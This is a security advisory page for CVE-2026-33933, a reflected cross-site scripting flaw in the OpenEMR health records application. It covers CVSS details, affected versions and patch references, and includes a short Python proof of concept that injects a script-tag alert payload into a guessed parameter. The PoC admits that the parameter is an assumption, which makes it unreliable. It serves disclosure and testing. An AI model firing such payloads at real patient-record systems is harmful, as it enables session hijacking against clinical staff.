Security Vulnerability Report
CVE-2026-33933 CVSS 6.1 MEDIUM

Published: 2026-03-26 00:16:40
Last Modified: 2026-03-26 16:17:57

Description

OpenEMR is a free and open source electronic health records and medical practice management application. Starting in version 7.0.2.1 and prior to version 8.0.0.3, a reflected cross-site scripting (XSS) vulnerability in the custom template editor allows an attacker to execute arbitrary JavaScript in an authenticated staff member's browser session by sending them a crafted URL. The attacker does not need an OpenEMR account. Version 8.0.0.3 patches the issue.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
(Attack Vector: Network; Attack Complexity: Low; Privileges Required: None; User Interaction: Required; Scope: Changed; Confidentiality: Low; Integrity: Low; Availability: None. Exploitability sub-score 2.8, impact sub-score 2.7.)

Configurations (Affected Products)

cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* - VULNERABLE
Affected range: OpenEMR >= 7.0.2.1 and < 8.0.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL structure for the custom template editor (placeholder host)
target_url = "http://target-openemr.com/interface/main/custom_template.php"

# JavaScript marker payload used to detect unencoded reflection
payload = "<script>alert('CVE-2026-33933 confirmed');</script>"

# Parameters to inject (assuming a vulnerable parameter based on typical XSS patterns)
params = {"template_id": payload}

try:
    # Send request simulating a victim clicking the link
    response = requests.get(target_url, params=params, timeout=10)

    # Verify if the payload is reflected in the response without proper encoding
    if payload in response.text:
        print("[+] Vulnerability Confirmed!")
        print(f"[+] Exploit URL: {response.url}")
    else:
        print("[-] Payload not reflected or patched.")
except requests.RequestException as e:
    print(f"Error: {e}")
```

Weakness

CWE-79 (Improper Neutralization of Input During Web Page Generation, i.e. Cross-site Scripting)

References

https://github.com/openemr/openemr/commit/d5c8d49ef19983472b2d7db0dbebd2dac9d6a200 (Patch)
https://github.com/openemr/openemr/commit/de9b6eb0da574430e8223c014cf4a05b0adc29d8 (Patch)
https://github.com/openemr/openemr/releases/tag/v8_0_0_3 (Product)
https://github.com/openemr/openemr/security/advisories/GHSA-9qh7-cfq4-j7c3 (Exploit, Vendor Advisory)

NVD record status: Analyzed